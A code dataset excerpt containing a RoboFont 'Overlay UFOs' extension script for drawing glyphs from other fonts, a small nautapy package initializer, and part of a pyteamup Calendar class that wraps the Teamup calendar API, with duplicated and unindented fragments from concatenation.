def updateView(self, sender=None):
UpdateCurrentGlyphView()
def windowCloseCallback(self, sender):
self.deactivateModule()
self.updateView()
BaseWindowController.windowCloseCallback(self, sender)
def getFontItems(self, update=False):
"""
Get all fonts in a way that can be set into a vanilla list.
"""
paths = set() # Set of all unique paths in the merges lists
itemsByName = {}
if update: # If update flag is set, then keep the existing selected fonts.
for item in self.getSourceFonts():
if item['status']:
itemsByName[item['name']] = item
currentStatuses = {}
if hasattr(self.getView(), 'fontList'):
for d in self.getSourceFonts():
currentStatuses[d['path']] = d['status']
for status, path, uniqueName in self.tool.getFontLabels():
if path in currentStatuses:
status = currentStatuses[path]
else:
status = selectedSymbol
if not uniqueName in itemsByName.keys():# If it is not already there, add this to the list
itemsByName[uniqueName] = dict(status=status, path=path, name=uniqueName)
fontList = []
for key, item in sorted(itemsByName.items()):
fontList.append(item)
return fontList
################
# CONTEXTS
################
def getContexts(self):
if not hasattr(self, 'contextBefore'):
self.contextBefore = ''
if not hasattr(self, 'contextAfter'):
self.contextAfter = ''
if not hasattr(self, 'contextCurrent'):
self.contextCurrent = None
return self.contextBefore, self.contextCurrent, self.contextAfter
def setContexts(self, contextBefore, contextCurrent, contextAfter):
self.contextBefore = contextBefore
self.contextCurrent = contextCurrent
self.contextAfter = contextAfter
def contextEditCallback(self, sender):
before = self.getView().contextBefore.get()
current = self.getView().contextCurrent.get() or None
after = self.getView().contextAfter.get()
self.setContexts(before, current, after)
self.updateView()
def contextCurrentEditCallback(self, sender):
#if sender.get():
#sender.set(sender.get()[0])
self.contextEditCallback(sender)
if __name__ == "__main__":
    OverlayUFOs()
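# Note: this script depends on RoboFont-only modules (mojo, vanilla, lib.*),
# so it must be run from RoboFont's scripting window or installed as the
# surrounding .roboFontExt extension; it will not import standalone.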
from __future__ import division
"""
# OVERLAY UFOS
For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies.
"""
import os
from AppKit import * #@PydevCodeAnalysisIgnore
from vanilla import * #@PydevCodeAnalysisIgnore
from mojo.drawingTools import *
from mojo.events import addObserver, removeObserver
from mojo.extensions import getExtensionDefault, setExtensionDefault, getExtensionDefaultColor, setExtensionDefaultColor
from mojo.UI import UpdateCurrentGlyphView
from fontTools.pens.transformPen import TransformPen
from defconAppKit.windows.baseWindow import BaseWindowController
import unicodedata
#from lib.tools.defaults import getDefaultColor
from lib.tools.drawing import strokePixelPath
from lib.UI.spaceCenter.glyphSequenceEditText import splitText
from builtins import chr
selectedSymbol = u'•'
def SmallTextListCell(editable=False):
cell = NSTextFieldCell.alloc().init()
size = NSSmallControlSize #NSMiniControlSize
cell.setControlSize_(size)
font = NSFont.systemFontOfSize_(NSFont.systemFontSizeForControlSize_(size))
cell.setFont_(font)
cell.setEditable_(editable)
return cell
class TX:
"""
An agnostic way to get a naked font.
"""
@classmethod
def naked(cls, f):
try:
return f.naked()
except:
return f
class Tool():
"""
The tool object manages the font list. This is a simplification.
"""
fonts = AllFonts()
def addObserver(self, target, method, action):
addObserver(target, method, action)
def removeObserver(self, target, method, action):
removeObserver(target, method, action)
def getCurrentFont(self):
return CurrentFont()
def getFonts(self):
u"""Answers the list of selected fonts, ordered by their path.
"""
return self.fonts
def appendToFonts(self, path):
f = OpenFont(path, showUI=False)
self.fonts.append(f)
def removeFromFonts(self, path):
for i, f in enumerate(self.fonts):
if f.path == path:
del self.fonts[i]
def getFontPaths(self):
return [f.path or str(f.info.familyName)+" "+str(f.info.styleName) for f in self.getFonts()]
def getFontLabel(self, path):
if path is None:
return None
if not path:
return 'Untitled'
name = path.split('/')[-1]
status = selectedSymbol
return status, path, name
def getFontLabels(self):
labels = {}
for path in self.getFontPaths():
if path:
label = self.getFontLabel(path)
name = label[-1]
else:
name = 'Untitled'
if not name in labels:
labels[name] = []
labels[name].append(label)
sortedLabels = []
for _, labelSet in sorted(labels.items()):
if len(labelSet) == 1: # There is only a single font with this name
sortedLabels.append(labelSet[0])
else: # Otherwise we'll have to construct new names to show the difference
for status, path, name in sorted(labelSet):
sortedLabels.append((status, path, '%s "%s"' % (name, '/'.join(path.split('/')[:-1]))))
return sortedLabels
class C:
"""
Some constants.
"""
C2 = 100
BUTTON_WIDTH = 80
STYLE_CHECKBOXSIZE = 'small'
STYLE_LABELSIZE = 'small'
STYLE_RADIOSIZE = 'small'
L = 22
LL = 25
class OverlayUFOs(BaseWindowController):
DEFAULTKEY = "com.fontbureau.overlayUFO"
DEFAULTKEY_FILLCOLOR = "%s.fillColor" %DEFAULTKEY
DEFAULTKEY_STROKECOLOR = "%s.strokeColor" %DEFAULTKEY
DEFAULTKEY_STROKE = "%s.stroke" %DEFAULTKEY
DEFAULTKEY_FILL = "%s.fill" %DEFAULTKEY
FALLBACK_FILLCOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .1)
FALLBACK_STROKECOLOR = NSColor.colorWithCalibratedRed_green_blue_alpha_(.5, 0, .5, .5)
VERSION = 1.0
NAME = u'Overlay UFOs'
MANUAL = u"""In the current glyph window, this will present the view the same glyph from a separate
UFO or set of UFOs.<br/>
This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view.
<ul>
<li>There is no need to import duplicate data into a background layer.</li>
<li>The source outline is always live; when changes are made to the source, they will automatically
appear in the current without re-importing.</li>
<li>The source font does not need to be opened with a UI.</li>
</ul>
<h3>DIALOG</h3>
<ul>
<li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li>
<li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will
return this list to self.getOpenFonts().</li>
<li>Adding Fonts: You can manually add fonts by selecting a UFO file.
The UFO file will open without an interface.</li>
<li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li>
</ul>
<h3>BUGS/IMPROVEMENTS</h3>
<ul>
<li>Known Issue: The source font is drawn on top of the current font, instead of behind it.
So, it is good to select a color with a low opacity.</li>
<li>Known Bug: If the glyph window for both source and current fonts are open, it is possible
to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li>
<li>Improvement?: Add options to scale the source font.</li>
<li>Improvement?: Set different colors, fill settings for each font?</li>
</ul>
"""
# Fixed width of the window.
VIEWMINSIZE = 400
VIEWSIZE = VIEWMINSIZE
VIEWMAXSIZE = VIEWMINSIZE
WINDOW_POSSIZE = (130, 20, VIEWSIZE, 260)
WINDOW_MINSIZE = (VIEWMINSIZE, 260)
WINDOW_MAXSIZE = (VIEWMAXSIZE, 260)
def getPathListDescriptor(self):
return [
dict(title='Status', key='status', cell=SmallTextListCell(editable=False), width=12, editable=False),
dict(title='Name', key='name', width=300, cell=SmallTextListCell(editable=False), editable=False),
dict(title='Path', key='path', width=0, editable=False),
]
################
# OBSERVERS AND UPDATERS
################
def fontSelectionChanged(self):
self.setSourceFonts()
def activateModule(self):
self.tool.addObserver(self, 'drawInactive', 'drawInactive')
self.tool.addObserver(self, 'drawBackground', 'drawBackground')
self.tool.addObserver(self, 'fontDidOpen', 'fontDidOpen')
self.tool.addObserver(self, 'fontWillClose', 'fontWillClose')
def deactivateModule(self):
removeObserver(self, 'drawBackground')
removeObserver(self, 'drawInactive')
removeObserver(self, 'fontDidOpen')
removeObserver(self, 'fontWillClose')
################
# CONTEXTS
################
def fontDidOpen(self, info):
font = info.get('font')
if font:
self.tool.fonts.append(font)
self.refreshCallback()
def fontWillClose(self, info):
font = info.get('font')
path = font.path
if path:
self.tool.removeFromFonts(path)
self.refreshCallback()
def __init__(self):
self.tool = Tool()
self.w = FloatingWindow((400, 200), "Overlay UFOs", minSize=(400, 200))
self.populateView()
self.getView().open()
def getView(self):
return self.w
def refreshCallback(self, sender=None):
"""
Update the font list.
"""
self.getView().fontList.set(self.getFontItems())
def resetCallback(self, sender=None):
"""
Resets the view to the currently opened fonts.
"""
self.tool.fonts = AllFonts()
self.getView().fontList.set(self.getFontItems())
def addCallback(self, sender=None):
"""
Open a font without UI and add it to the font list.
"""
f = OpenFont(None, showUI=False)
if f is None:
return
self.tool.appendToFonts(f.path)
self.refreshCallback()
def populateView(self):
"""
The UI
"""
self.fillColor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
self.strokeColor = getExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, self.FALLBACK_STROKECOLOR)
self.contextBefore = self.contextAfter = ''
# Populating the view can only happen after the view is attached to the window,
# or else the relative widths go wrong.
view = self.getView()
view.add = Button((-40, 3, 30, 22), '+', callback=self.addCallback)
view.reset = Button((-40, 30, 30, 22), chr(8634), callback=self.resetCallback)
# Flag to see if the selection list click is in progress. We are resetting the selection
# ourselves, using the list "buttons", but changing that selection will cause another
# list update, that should be ignored.
self._selectionChanging = False
# Indicate that we are a drawing module
self._canDraw = True
self.sources = []
x = y = 4
view.fontList = List((C.C2, y, 250, -65), self.getFontItems(),
selectionCallback=self.fontListCallback,
drawFocusRing=False,
enableDelete=False,
allowsMultipleSelection=False,
allowsEmptySelection=True,
drawHorizontalLines=True,
showColumnTitles=False,
columnDescriptions=self.getPathListDescriptor(),
rowHeight=16,
)
view.viewEnabled = CheckBox((x, y, C.BUTTON_WIDTH, 22), "Show",
callback=self.viewCallback, sizeStyle=C.STYLE_CHECKBOXSIZE,
value=True)
y += C.L
view.fill = CheckBox((x, y, 60, 22), "Fill", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True),
value = True,
callback=self.fillCallback)
y += C.L
color = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
view.color = ColorWell((x, y, 60, 22),
color=color,
callback=self.colorCallback)
y += C.L + 5
view.stroke = CheckBox((x, y, 60, 22), "Stroke", sizeStyle=C.STYLE_CHECKBOXSIZE,
#value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False),
value = False,
callback=self.strokeCallback)
y += C.LL
view.alignText = TextBox((x, y, 90, 50), 'Alignment', sizeStyle=C.STYLE_LABELSIZE)
y += C.L
view.align = RadioGroup((x, y, 90, 50), ['Left', 'Center', 'Right'], isVertical=True,
sizeStyle=C.STYLE_RADIOSIZE, callback=self.alignCallback)
view.align.set(0)
#view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE)
view.viewCurrent = CheckBox((C.C2, -60, 150, 22), "Always View Current", sizeStyle=C.STYLE_CHECKBOXSIZE,
value = False,
callback=self.contextEditCallback)
#view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE,
# value = False,
# callback=self.contextEditCallback)
view.contextBefore = EditText((C.C2, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Left Context')
view.contextCurrent = EditText((C.C2+95, -30, 60, 20), callback=self.contextCurrentEditCallback, continuous=True, sizeStyle="small")
view.contextAfter = EditText((C.C2+165, -30, 85, 20), callback=self.contextEditCallback, continuous=True, sizeStyle="small", placeholder='Right Context')
self.activateModule()
self.setUpBaseWindowBehavior()
def fontListCallback(self, sender):
u"""If there is a selection, toggle the status of these fonts."""
# Avoid recursive loop because of changing font selection
if not self._selectionChanging:
for selectedIndex in sender.getSelection():
item = sender.get()[selectedIndex]
if item['status']:
item['status'] = ''
else:
item['status'] = selectedSymbol
# If shift is held when pressing an entry in the font list,
# the non-selected fonts will swap with the current's state
if NSEvent.modifierFlags() & NSShiftKeyMask:
items = [sender.get()[i] for i in range(len(sender.get())) if i != selectedIndex]
for subItems in items:
if item['status'] == '':
subItems['status'] = selectedSymbol
else:
subItems['status'] = ''
self._selectionChanging = True
# Avoid recursive loop because of changing font selection
sender.setSelection([])
self._selectionChanging = False
self.updateView()
def canDraw(self):
return True
"""
There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
"""
#def isUpper(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Lu':
# return True
# return False
#def isLower(self, g):
# char = CharacterTX.glyph2Char(g)
# if len(char) > 1:
# char = char[0]
# if unicodedata.category(char) == 'Ll':
# return True
# return False
def getHiddenFont(self, path):
from builtins import str
for f in self.tool.getFonts():
if f.path == path:
return f
elif path == str(f.info.familyName)+" "+str(f.info.styleName):
return f
def drawBackground(self, info):
u"""Draw the background of defined glyphs and fonbts.
Scale is available as mouse.scale."""
view = self.getView()
if not view.viewEnabled.get():
return
fill = getExtensionDefault(self.DEFAULTKEY_FILL, True)
stroke = getExtensionDefault(self.DEFAULTKEY_STROKE, True)
fillcolor = getExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, self.FALLBACK_FILLCOLOR)
glyph = info.get('glyph')
if glyph is not None:
current = glyph.getParent()
else:
current = self.tool.getCurrentFont()
if glyph is None or current is None:
return
align = self.getAlignment()
# Get the fonts from the list and see if they are selected.
sourceItems = self.getSourceFonts()
showFonts = []
for item in sourceItems:
if not item['status']:
continue
path = item['path']
font = self.getHiddenFont(path)
showFonts.append(font)
if view.viewCurrent.get() and current not in showFonts:
showFonts.append(current)
for font in showFonts:
self.fillColor.setFill()
self.strokeColor.setStroke()
contextBefore, contextCurrent, contextAfter = self.getContexts()
if font is not None:
contextBefore = splitText(contextBefore, TX.naked(font).unicodeData, TX.naked(font).groups)
contextBefore = [font[gname] for gname in contextBefore if gname in font.keys()]
contextAfter = splitText(contextAfter, TX.naked(font).unicodeData, TX.naked(font).groups)
contextAfter = [font[gname] for gname in contextAfter if gname in font.keys()]
contextCurrent = splitText(contextCurrent, TX.naked(font).unicodeData, TX.naked(font).groups)
if len(contextCurrent) > 0:
contextCurrent = [font[gname] for gname in [contextCurrent[0]] if gname in font.keys()]
if len(contextCurrent) > 0:
sourceGlyph = contextCurrent[0]
else:
sourceGlyph = None
elif glyph.name in font.keys():
sourceGlyph = font[glyph.name]
else:
sourceGlyph = None
"""
#There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now.
if view.contextUandlc.get():
caseTransform = None
if self.isUpper(glyph):
caseTransform = FontTX.unicodes.getUpperFromLower
elif self.isLower(glyph):
caseTransform = FontTX.unicodes.getLowerFromUpper
if caseTransform:
for i, g in enumerate(contextBefore):
newG = caseTransform(g)
if newG is not None:
contextBefore[i] = newG
newG = caseTransform(sourceGlyph)
if newG is not None:
sourceGlyph = newG
if caseTransform:
for i, g in enumerate(contextAfter):
newG = caseTransform(g)
if newG is not None:
contextAfter[i] = newG
"""
scale(current.info.unitsPerEm/float(font.info.unitsPerEm))
widthOffset = 0
if sourceGlyph is not None:
if align == 'center':
destCenter = float(glyph.width/2) / current.info.unitsPerEm
sourceCenter = float(sourceGlyph.width/2) / font.info.unitsPerEm
widthOffset = (destCenter-sourceCenter) * font.info.unitsPerEm
elif align == 'right':
widthOffset = ( ( glyph.width / glyph.getParent().info.unitsPerEm ) - (sourceGlyph.width / sourceGlyph.getParent().info.unitsPerEm ) ) * font.info.unitsPerEm
translate(widthOffset, 0)
previousGlyph = sourceGlyph
contextBefore.reverse()
totalWidth = 0
for i, cbGlyph in enumerate(contextBefore):
kernValue = 0
if previousGlyph is not None and previousGlyph.getParent() == cbGlyph.getParent():
# Uncomment to activate kerning. Requires FontTX.
#kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups)
kernValue += 0
translate(-cbGlyph.width-kernValue, 0)
totalWidth += cbGlyph.width + kernValue
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
previousGlyph = cbGlyph
translate(totalWidth, 0)
totalWidth = 0
contextCurrentAndAfter = [sourceGlyph]+contextAfter
for i, cbGlyph in enumerate(contextCurrentAndAfter):
if cbGlyph is None:
cbGlyph = sourceGlyph
nextGlyph = None
if i + 1 < len(contextCurrentAndAfter):
nextGlyph = contextCurrentAndAfter[i+1]
if (i == 0 and cbGlyph == glyph) or sourceGlyph is None:
pass
else:
drawGlyphPath = TX.naked(cbGlyph).getRepresentation("defconAppKit.NSBezierPath")
if view.fill.get():
drawGlyphPath.fill()
if view.stroke.get():
strokePixelPath(drawGlyphPath)
kernValue = 0
if cbGlyph is not None and nextGlyph is not None and nextGlyph.getParent() == cbGlyph.getParent():
#kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups)
# Uncomment to activate kerning. Requires FontTX.
kernValue = 0
width = 0
if cbGlyph is not None:
width = cbGlyph.width
translate(width+kernValue, 0)
totalWidth += width + kernValue
previousGlyph = cbGlyph
translate(-totalWidth, 0)
translate(-widthOffset, 0)
scale(font.info.unitsPerEm/float(current.info.unitsPerEm))
#restore()
drawInactive = drawBackground
def viewCallback(self, sender):
self.updateView()
def getSourceFonts(self):
"""
Get the fonts in the list.
"""
view = self.getView()
return view.fontList.get()
def setSourceFonts(self):
u"""
Set the font list from the current set of open fonts.
"""
view = self.getView()
labels = []
currentSelection = []
for d in self.getSourceFonts():
if d['status']:
currentSelection.append(d['path'])
for status, path, name in self.tool.getFontLabels():
if path in currentSelection:
status = selectedSymbol
else:
status = ''
labels.append(dict(status=status, path=path, name=name))
view.fontList.set(labels)
def colorCallback(self, sender):
"""
Change the color.
"""
selectedColor = sender.get()
r = selectedColor.redComponent()
g = selectedColor.greenComponent()
b = selectedColor.blueComponent()
a = 1
strokeColor = NSColor.colorWithCalibratedRed_green_blue_alpha_(r, g, b, a)
setExtensionDefaultColor(self.DEFAULTKEY_FILLCOLOR, selectedColor)
setExtensionDefaultColor(self.DEFAULTKEY_STROKECOLOR, strokeColor)
self.fillColor = selectedColor
self.strokeColor = strokeColor
self.updateView()
def fillCallback(self, sender):
"""
Change the fill status.
"""
setExtensionDefault(self.DEFAULTKEY_FILL, sender.get())
self.updateView()
def strokeCallback(self, sender):
"""
Change the stroke status.
"""
setExtensionDefault(self.DEFAULTKEY_STROKE, sender.get())
self.updateView()
def alignCallback(self, sender):
"""
Change the alignment status.
"""
self.updateView()
def getAlignment(self):
"""
Get the alignment as a string.
"""
view = self.getView()
index = view.align.get()
if index == 0:
return 'left'
elif index == 1:
return 'center'
elif index == 2:
return 'right'
def updateView(self, sender=None):
UpdateCurrentGlyphView()
def windowCloseCallback(self, sender):
self.deactivateModule()
self.updateView()
BaseWindowController.windowCloseCallback(self, sender)
def getFontItems(self, update=False):
"""
Get all fonts in a way that can be set into a vanilla list.
"""
paths = set() # Set of all unique paths in the merged lists
itemsByName = {}
if update: # If update flag is set, then keep the existing selected fonts.
for item in self.getSourceFonts():
if item['status']:
itemsByName[item['name']] = item
currentStatuses = {}
if hasattr(self.getView(), 'fontList'):
for d in self.getSourceFonts():
currentStatuses[d['path']] = d['status']
for status, path, uniqueName in self.tool.getFontLabels():
if path in currentStatuses:
status = currentStatuses[path]
else:
status = selectedSymbol
if uniqueName not in itemsByName: # If it is not already there, add this to the list
itemsByName[uniqueName] = dict(status=status, path=path, name=uniqueName)
fontList = []
for key, item in sorted(itemsByName.items()):
fontList.append(item)
return fontList
################
# CONTEXTS
################
def getContexts(self):
if not hasattr(self, 'contextBefore'):
self.contextBefore = ''
if not hasattr(self, 'contextAfter'):
self.contextAfter = ''
if not hasattr(self, 'contextCurrent'):
self.contextCurrent = None
return self.contextBefore, self.contextCurrent, self.contextAfter
def setContexts(self, contextBefore, contextCurrent, contextAfter):
self.contextBefore = contextBefore
self.contextCurrent = contextCurrent
self.contextAfter = contextAfter
def contextEditCallback(self, sender):
before = self.getView().contextBefore.get()
current = self.getView().contextCurrent.get() or None
after = self.getView().contextAfter.get()
self.setContexts(before, current, after)
self.updateView()
def contextCurrentEditCallback(self, sender):
#if sender.get():
#sender.set(sender.get()[0])
self.contextEditCallback(sender)
if __name__ == "__main__":
OverlayUFOs() | en | 0.706843 | #coding=utf-8 # OVERLAY UFOS For anyone looking in here, sorry the code is so messy. This is a standalone version of a script with a lot of dependencies. #@PydevCodeAnalysisIgnore #@PydevCodeAnalysisIgnore #from lib.tools.defaults import getDefaultColor #NSMiniControlSize An agnostic way to get a naked font. The tool object manages the font list. This is a simplification. Answers the list of selected fonts, ordered by their path. # There is only a single font with this name # Otherwise we'll have to construct new names to show the difference Some constants. In the current glyph window, this will present the view the same glyph from a separate UFO or set of UFOs.<br/> This does NOT import the UFO into a background layer. Instead, it renders a outline directly from the UFO into the glyph window view. <ul> <li>There is no need to import duplicate data into a background layer.</li> <li>The source outline is always live; when changes are made to the source, they will automatically appear in the current without re-importing.</li> <li>The source font does not need to be opened with a UI.</li> </ul> <h3>DIALOG</h3> <ul> <li>A floating dialog is present to let you open and select source fonts, fill, stroke, color.</li> <li>Source Fonts: The default source font list is self.getOpenFonts(). The refresh button will return this list to self.getOpenFonts().</li> <li>Adding Fonts: You can manually add fonts by selecting a UFO file. The UFO file will open without an interface.</li> <li>Removing Fonts: There are buttons for removing selected fonts and for clearing the source font list.</li> </ul> <h3>BUGS/IMPROVEMENTS</h3> <ul> <li>Known Issue: The source font is drawn on top of the current font, instead of behind it. So, it is good to select a color with a low opacity.</li> <li>Known Bug: If the glyph window for both source and current fonts are open, it is possible to select and inadvertently edit the source outline in the current window. I don't know how to solve this.</li> <li>Improvement?: Add options to scale the source font.</li> <li>Improvement?: Set different colors, fill settings for each font?</li> </ul> # Fixed width of the window. ################ # OBSERVERS AND UPDATERS ################ ################ # CONTEXTS ################ Update the font list. Resets the view to the currently opened fonts. Open a font without UI and add it to the font list. The UI # Populating the view can only happen after the view is attached to the window, # or else the relative widths go wrong. # Flag to see if the selection list click is in progress. We are resetting the selection # ourselves, using the list "buttons", but changing that selection will cause another # list update, that should be ignored. # Indicate that we are a drawing module #value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "fill"), True), #value=getExtensionDefault("%s.%s" %(self.DEFAULTKEY, "stroke"), False), #view.contextLabel = TextBox((C.C2, -58, 90, 50), 'Contexts', sizeStyle=C.STYLE_LABELSIZE) #view.contextUandlc = CheckBox((C.C2+170, -60, 85, 22), "Match Case", sizeStyle=C.STYLE_CHECKBOXSIZE, # value = False, # callback=self.contextEditCallback) If there is a selection, toggle the status of these fonts.
# Avoid recursive loop because of changing font selection # If shift is held when pressing an entry in the font list, # the non-selected fonts will swap with the current's state # Avoid recursive loop because of changing font selection There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now. #def isUpper(self, g): # char = CharacterTX.glyph2Char(g) # if len(char) > 1: # char = char[0] # if unicodedata.category(char) == 'Lu': # return True # return False #def isLower(self, g): # char = CharacterTX.glyph2Char(g) # if len(char) > 1: # char = char[0] # if unicodedata.category(char) == 'Ll': # return True # return False Draw the background of defined glyphs and fonbts. Scale is available as mouse.scale. # Get the fonts from the list and see if they are selected. #There is an experimental feature that will change the case of the context characters based on the case of the current glyph. But I'm disabling that for now. if view.contextUandlc.get(): caseTransform = None if self.isUpper(glyph): caseTransform = FontTX.unicodes.getUpperFromLower elif self.isLower(glyph): caseTransform = FontTX.unicodes.getLowerFromUpper if caseTransform: for i, g in enumerate(contextBefore): newG = caseTransform(g) if newG is not None: contextBefore[i] = newG newG = caseTransform(sourceGlyph) if newG is not None: sourceGlyph = newG if caseTransform: for i, g in enumerate(contextAfter): newG = caseTransform(g) if newG is not None: contextAfter[i] = newG # Uncomment to activate kerning. Requires FontTX. #kernValue += FontTX.kerning.getValue((previousGlyph.name, cbGlyph.name), font.kerning, font.groups) #kernValue = FontTX.kerning.getValue((cbGlyph.name, nextGlyph.name), font.kerning, font.groups) # Uncomment to activate kerning. Requires FontTX. #restore() Get the fonts in the list. Set the font list from the current set of open fonts. Change the color. Change the fill status. Change the stroke status. Change the alignment status. Get the alignment as a string. Get all fonts in a way that can be set into a vanilla list. # Set of all unique paths in the merges lists # If update flag is set, then keep the existing selected fonts. # If it is not already there, add this to the list ################ # CONTEXTS ################ #if sender.get(): #sender.set(sender.get()[0]) | 1.961254 | 2 |
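A quick sketch of the alignment arithmetic used in drawBackground above, pulled out as a standalone function so the center/right offset logic is easier to follow. This assumes only glyph widths and unitsPerEm values feed into the offset; the function name and the sample numbers are illustrative, not part of the extension.

def width_offset(align, dest_width, dest_upm, source_width, source_upm):
    """Horizontal offset (in source font units) that aligns a source glyph
    to the destination glyph, mirroring the 'center'/'right' branches above."""
    if align == 'center':
        dest_center = (dest_width / 2.0) / dest_upm
        source_center = (source_width / 2.0) / source_upm
        return (dest_center - source_center) * source_upm
    if align == 'right':
        return ((dest_width / dest_upm) - (source_width / source_upm)) * source_upm
    return 0  # 'left' needs no offset

print(width_offset('center', 600, 1000, 500, 1000))  # 50.0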
nautapy/__init__.py | armandofcom/nautapy | 25 | 10384 | <gh_stars>10-100
import os
appdata_path = os.path.expanduser("~/.local/share/nautapy")
os.makedirs(appdata_path, exist_ok=True)
| import os
appdata_path = os.path.expanduser("~/.local/share/nautapy")
os.makedirs(appdata_path, exist_ok=True) | none | 1 | 1.599525 | 2 |
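The initializer above only guarantees that a per-user data directory exists. A hypothetical sketch of how client code might place a file under it; the session.json file name is an assumption, not something the package defines.

import json
import os

from nautapy import appdata_path

session_file = os.path.join(appdata_path, "session.json")  # hypothetical file name
with open(session_file, "w") as fp:
    json.dump({"logged_in": False}, fp)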
|
pyteamup/Calendar.py | LogicallyUnfit/pyTeamUp | 5 | 10385 | import requests
import json
import datetime
import sys
from dateutil.parser import parse as to_datetime
try:
import pandas as pd
except ImportError:
pass
from pyteamup.utils.utilities import *
from pyteamup.utils.constants import *
from pyteamup.Event import Event
class Calendar:
def __init__(self, cal_id, api_key):
self.__calendar_id = cal_id
self.__api_key = api_key
self.__cal_base = f'/{cal_id}'
self.__token_str = f'?_teamup_token={self.api_key}'
self.__subcalendars = None
self.__valid_api = None
self.__configuration = None
self._base_url = BASE_URL + self.__cal_base
self._event_collection_url = self._base_url + EVENTS_BASE + self.__token_str
self._subcalendars_url = self._base_url + SUBCALENDARS_BASE + self.__token_str
self._check_access_url = BASE_URL + CHECK_ACCESS_BASE + self.__token_str
self.events_json = None
if not self.valid_api:
raise Exception(f'Invalid Api Key: {self.api_key}')
def __str__(self):
return self.calendar_id
@property
def api_key(self):
return self.__api_key
@property
def calendar_id(self):
return self.__calendar_id
@property
def valid_api(self):
"""Makes a request to the calendar to see if the api is valid"""
if not self.__valid_api:
req = requests.get(self._check_access_url)
try:
check_status_code(req.status_code)
self.__valid_api = True
except:
self.__valid_api = False
return self.__valid_api
else:
return None
@property
def configuration(self):
if self.__configuration is None:
print('Fetching configuration')
req = requests.get(self._base_url + CONFIGURATION_BASE + self.__token_str)
check_status_code(req.status_code)
self.__configuration = json.loads(req.text)['configuration']
return self.__configuration
@property
def subcalendars(self):
if not self.__subcalendars:
print('Fetching Subcalendars')
req = requests.get(self._subcalendars_url)
check_status_code(req.status_code)
self.__subcalendars = json.loads(req.text)['subcalendars']
return self.__subcalendars
def clear_calendar_cache(self):
self.__subcalendars = None
self.__configuration = None
def get_event_collection(self, start_dt=None, end_dt=None, subcal_id=None, returnas='events', markdown=False):
"""
Method allows bulk fetching of events that fall between the provided time frame. If None is provided then
the current date -30 and +180 days is used.
:param start_dt: if set as None then set as today minus 30 days
:param end_dt: if left as None then set as today plus 180 days
:param subcal_id: optional str or list-like if a different calendar should be queried
:return: json of events
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: events, dataframe, dict')
if start_dt is None:
start_dt = datetime.date.today() - datetime.timedelta(30)
if end_dt is None:
end_dt = datetime.date.today() + datetime.timedelta(180)
subcal_par = ''
if subcal_id:
if isinstance(subcal_id, (list, tuple)):
for id in subcal_id:
subcal_par += f'&subcalendarId[]={id}'
else:
subcal_par = f'&subcalendarId[]={subcal_id}'
if markdown:
para_markdown = '&format[]=markdown'
else:
para_markdown = ''
parameters = f'&startDate={start_dt.strftime("%Y-%m-%d")}&endDate={end_dt.strftime("%Y-%m-%d")}' + subcal_par + para_markdown
req = requests.get(self._event_collection_url + parameters)
check_status_code(req.status_code)
self.events_json = json.loads(req.text)['events']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in self.events_json]
elif returnas == 'dataframe' and 'pandas' in sys.modules:
return pd.DataFrame.from_records(self.events_json)
else:
return self.events_json
def _create_event_from_json(self, payload):
""" Lazy Creation of Event by passing a formatted payload"""
resp = requests.post(self._event_collection_url, data=payload, headers=POST_HEADERS)
try:
check_status_code(resp.status_code)
except:
print(payload)
print(resp.text)
raise
return resp.text
def get_event(self, event_id, returnas='event'):
if returnas not in ('event', 'series', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: event, series, dict')
url = self._base_url + EVENTS_BASE + f'/{event_id}' + self.__token_str
resp = requests.get(url)
check_status_code(resp.status_code)
event_dict = json.loads(resp.text)['event']
if returnas == 'event':
return Event(self, **event_dict)
elif returnas == 'series' and 'pandas' in sys.modules:
return pd.Series(event_dict)
else:
return event_dict
def get_subcalendar(self):
raise NotImplementedError
def search_events(self):
raise NotImplementedError
def get_changed_events(self, modified_since, returnas='events'):
"""
Get changed events since given unix time
:param modified_since: <int> Unix timestamp, must be less than 30 days old
:param returnas: <str> `events` `dataframe` `dict` are valid options
:return: Tuple of event list and returned timestamp
"""
if returnas not in ('events', 'dataframe', 'dict'):
raise TypeError('Returnas not recognized. Recognized values: events, dataframe, dict')
url = self._base_url + EVENTS_BASE + self.__token_str + '&modifiedSince=' + str(modified_since)
resp = requests.get(url)
check_status_code(resp.status_code)
events_json = json.loads(resp.text)['events']
timestamp = json.loads(resp.text)['timestamp']
if returnas == 'events':
return [Event(self, **event_dict) for event_dict in events_json], timestamp
